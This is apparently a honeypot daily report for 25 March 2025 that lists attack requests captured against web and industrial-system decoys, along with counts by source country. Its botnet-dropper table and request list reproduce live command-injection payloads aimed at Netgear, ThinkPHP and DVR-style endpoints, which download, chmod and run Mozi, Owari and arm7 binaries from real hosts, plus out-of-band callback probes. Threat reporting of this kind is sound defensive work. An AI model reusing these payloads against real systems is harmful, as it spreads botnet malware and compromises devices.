Table of Contents

Daily Report: 2025-03-25
#

interaction report on http service of various Hhoneypot around the world.

OT report simplified
Botnet dropper behaviour
List of request
List of country_iso_code

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_country	targeted_country
FR	Australia
CN	Georgia
RO
IT
US	Dubai

botnet_dropper_behaviour
#

remote_addr	request
103.208.105.225	GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://103.208.105.225:45070/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
113.59.144.139	27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0
87.121.84.41	POST /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20-rf%20parm7%3B%20wget%20http%3A%2F%2F193.32.162.27%2Fbins%2Fparm7%3B%20chmod%20777%20parm7%3B%20.%2Fparm7%20sex HTTP/1.1
87.121.84.195	POST /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20-rf%20parm7%3B%20wget%20http%3A%2F%2F193.32.162.27%2Fbins%2Fparm7%3B%20chmod%20777%20parm7%3B%20.%2Fparm7%20sex HTTP/1.1
185.191.127.222	POST /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20arm7%3B%20wget%20http%3A%2F%2F42.112.26.36%2Farm7%3B%20chmod%20777%20%2A%3B%20.%2Farm7%20tbk HTTP/1.1
185.191.127.222	POST /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20arm7%3B%20wget%20http%3A%2F%2F103.153.68.112%2Farm7%3B%20chmod%20777%20%2A%3B%20.%2Farm7%20tbk HTTP/1.1
121.22.35.6	GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://5.255.115.56/x86_64 -O /tmp/.phpdsds; chmod 777 /tmp/.phpdsds; /tmp/.phpdsds php.x86’ HTTP/1.1
217.160.89.196	GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=‘wget http://45.137.70.156/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp’ HTTP/1.1
200.81.185.179	GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=‘wget http://157.230.218.54/bins/nine.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp’ HTTP/1.1
84.195.192.75	GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://5.255.115.56/x86_64 -O /tmp/.phpdsds; chmod 777 /tmp/.phpdsds; /tmp/.phpdsds php.x86’ HTTP/1.1
58.93.52.144	GET /shell?cd+/tmp;rm+-rf+*;wget+ http://200.129.143.6/Binarys/Owari.arm;chmod+777+/tmp/Owari.arm;sh+/tmp/Owari.arm arm4.jaws HTTP/1.1

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

	number_of_occurence	request
183	4	GET /pi.php HTTP/1.1
253	3	GET /js/jquery-ui.mainControllers.js HTTP/1.1
258	2	GET /login/signin.css HTTP/1.1
278	2	GET /authenticationendpoint/2unmxagbusfz26izqi9mdvqpi5g.jsp HTTP/1.1
279	2	POST /xmlrpc HTTP/1.1
280	2	POST /fileupload/toolsAny HTTP/1.1
281	2	POST /login/index.php?login=$(ping${IFS}-nc${IFS}2${IFS}`whoami`.cvh6v8ndueip41jikc8gherai8iouqkgg.oast.pro) HTTP/1.1
282	2	POST /goanywhere/lic/accept HTTP/1.1
283	2	GET /pentaho/api/ldap/config/ldapTreeNodeChildren/require.js?url=%23{T(java.net.InetAddress).getByName(‘cvh6v8ndueip41jikc8grfzypjgb8hnky.oast.pro’)}&mgrDn=a&pwd=a HTTP/1.1
284	2	POST /SamlResponseServlet HTTP/1.1
303	1	\x00\x0E8\x1B\xC1j\xEF*3\xDC\x02\x00\x00\x00\x00\x00
308	1	GET /allversions HTTP/1.1
309	1	GET /versions HTTP/1.1
310	1	GET /r-seenet/index.php HTTP/1.1
311	1	GET /api/vip/i18n/api/v2/translation/products/vRNIUI/versions/1 HTTP/1.1
312	1	GET /tos/index.php?user/login HTTP/1.1
313	1	GET /c/login HTTP/1.1
314	1	GET /WebApp/js/UI_String.js HTTP/1.1
315	1	GET /login.aspx HTTP/1.1
316	1	GET /officescan/console/html/localization.js HTTP/1.1
317	1	GET /officescan/console/cgi/cgiChkMasterPwd.exe HTTP/1.1
338	1	GET /login/login.html HTTP/1.1
339	1	GET /dniapi/userInfos HTTP/1.1
367	1	\x00\x0E8r=\xF1\xAE.\xFE[4\x00\x00\x00\x00\x00
374	1	\x00\x0E8P\xA2\x8E\x847\x9D\xD9\xFC\x00\x00\x00\x00\x00
389	1	GET /Module1/js/Module_b1827afbcecf98cd0e40b9ee2187b3ac.js HTTP/1.1
390	1	GET /socket.io/1/?t=1742935486640 HTTP/1.1
413	1	\x00\x00\x00\xE0Z\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x05\x01=K\x00\x00\x01\x01\x13\x01\xA8\xC0\xF0 \xFF$E\xFF/\x00admin\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x000\x81\x89\x02\x81\x81\x00\xC4\xBF\xB4\xFC\x5C\xA8%\x92L\xA9\xD3\xA2\x9D#\xAB\xE6\x91D%bsb\x1Dv\xBC\xCFo\x8D\xFD\x1D\xFD\xDD\xEB\xDE\x13]j\x06\xAC\x9F\xF5\x87\xB6}\xBB\x1C\x03\xC9t\xB8\x9E\x8A\x9F#f\x915f)\xB0\xBFk\xA2\xC2\x8B\xEA\xAE\x97\xAE\xA1\x13\xEC\x1Dnm\x0C\x04\xF0\xF7\x95\xE9\xF23\xE8\xC1\xC5\x0B\xB5\xFD7l\xC9\xA2U\xE0\x9D\xF1\x03\xFEVi#
415	1	\xA0\x05\x00`\x00\x00\x00\x00\xC4\xA3\xAFH\x99V\xB6\xB4\x02\xEF\x85\x8E\x8E(\x15L\x05\x02\x00\x01\x00\x00\xA1\xAA
445	1	GET /bLmA HTTP/1.1
446	1	GET /ps7C HTTP/1.1
463	1	GET /Wh1l HTTP/1.1
464	1	GET /Qhn6 HTTP/1.1
466	1	\x00\x0E8o\x8F\x8E\xE01\x9CE\xC4\x00\x00\x00\x00\x00
469	1	GET /PuLK HTTP/1.1
470	1	GET /AqBi HTTP/1.1
478	1	\x00\x0E8\xBAH!\xB8\x1C\x83\xF6q\x00\x00\x00\x00\x00
480	1	\x05\x02\x00\x02
481	1	\x04\x01\x01\xBB@\xE9\xA2j\x00
482	1	\x04\x01\x01\xBB@\xE9\xA2iadm:12345\x00
485	1	GET /env.cgi HTTP/1.1
507	1	GET /socket.io/1/?t=1742879203601 HTTP/1.1
508	1	GET /socket.io/1/?t=1742879210358 HTTP/1.1
509	1	GET /socket.io/1/?t=1742879554555 HTTP/1.1
510	1	GET /socket.io/1/?t=1742931043620 HTTP/1.1
516	1	\x00\x0E8\xCDE\x82(\xCA\xB1{t\x00\x00\x00\x00\x00
520	1	GET /robots1.txt HTTP/1.1

country_iso_code
#

	number_of_occurence	country_iso_code
0	830	NL
1	309	US
2	191	BG
3	131	PL
4	131	HK
5	97	FR
6	95	DE
7	67	CN
8	63	RO
9	58	BR
10	58	RU
11	56	GB
12	53	CH
13	52	PT
14	45	IT
15	45	VN
16	39	NO
17	30	SC
18	26	CA
19	20	JP
20	18	UA
21	18	IN
22	15	NG
23	14	VE
24	13	LT
25	12	ZA
26	9	SG
27	9	BE
28	9	GH
29	7	KR
30	4	ID
31	4	SA
32	4	AZ
33	2	ES
34	2	SE
35	2	GE
36	2	AR
37	2	CZ
38	2	IE
39	1	MC
40	1	KH
41	1	IR
42	1	CL
43	1	AU
44	1	PK
45	1	PA
46	1	CO
47	1	AE
48	1	TW
49	1	MD
50	1	TR

Report: 2025-03-24

24 March 2025·720 words

Repport Daily

Report: 2025-03-23

23 March 2025·2901 words

Repport Daily

Report: 2025-03-22

22 March 2025·4611 words

Repport Daily

	number_of_occurence	country_iso_code
0	830	NL
1	309	US
2	191	BG
3	131	PL
4	131	HK
5	97	FR
6	95	DE
7	67	CN
8	63	RO
9	58	BR
10	58	RU
11	56	GB
12	53	CH
13	52	PT
14	45	IT
15	45	VN
16	39	NO
17	30	SC
18	26	CA
19	20	JP
20	18	UA
21	18	IN
22	15	NG
23	14	VE
24	13	LT
25	12	ZA
26	9	SG
27	9	BE
28	9	GH
29	7	KR
30	4	ID
31	4	SA
32	4	AZ
33	2	ES
34	2	SE
35	2	GE
36	2	AR
37	2	CZ
38	2	IE
39	1	MC
40	1	KH
41	1	IR
42	1	CL
43	1	AU
44	1	PK
45	1	PA
46	1	CO
47	1	AE
48	1	TW
49	1	MD
50	1	TR

	number_of_occurence	country_iso_code
0	830	NL
1	309	US
2	191	BG
3	131	PL
4	131	HK
5	97	FR
6	95	DE
7	67	CN
8	63	RO
9	58	BR
10	58	RU
11	56	GB
12	53	CH
13	52	PT
14	45	IT
15	45	VN
16	39	NO
17	30	SC
18	26	CA
19	20	JP
20	18	UA
21	18	IN
22	15	NG
23	14	VE
24	13	LT
25	12	ZA
26	9	SG
27	9	BE
28	9	GH
29	7	KR
30	4	ID
31	4	SA
32	4	AZ
33	2	ES
34	2	SE
35	2	GE
36	2	AR
37	2	CZ
38	2	IE
39	1	MC
40	1	KH
41	1	IR
42	1	CL
43	1	AU
44	1	PK
45	1	PA
46	1	CO
47	1	AE
48	1	TW
49	1	MD
50	1	TR

Daily Report: 2025-03-25#

ot_simplified_report#

botnet_dropper_behaviour#

request#

country_iso_code#

Related

Daily Report: 2025-03-25
#

ot_simplified_report
#

botnet_dropper_behaviour
#

request
#

country_iso_code
#

	number_of_occurence	country_iso_code
0	830	NL
1	309	US
2	191	BG
3	131	PL
4	131	HK
5	97	FR
6	95	DE
7	67	CN
8	63	RO
9	58	BR
10	58	RU
11	56	GB
12	53	CH
13	52	PT
14	45	IT
15	45	VN
16	39	NO
17	30	SC
18	26	CA
19	20	JP
20	18	UA
21	18	IN
22	15	NG
23	14	VE
24	13	LT
25	12	ZA
26	9	SG
27	9	BE
28	9	GH
29	7	KR
30	4	ID
31	4	SA
32	4	AZ
33	2	ES
34	2	SE
35	2	GE
36	2	AR
37	2	CZ
38	2	IE
39	1	MC
40	1	KH
41	1	IR
42	1	CL
43	1	AU
44	1	PK
45	1	PA
46	1	CO
47	1	AE
48	1	TW
49	1	MD
50	1	TR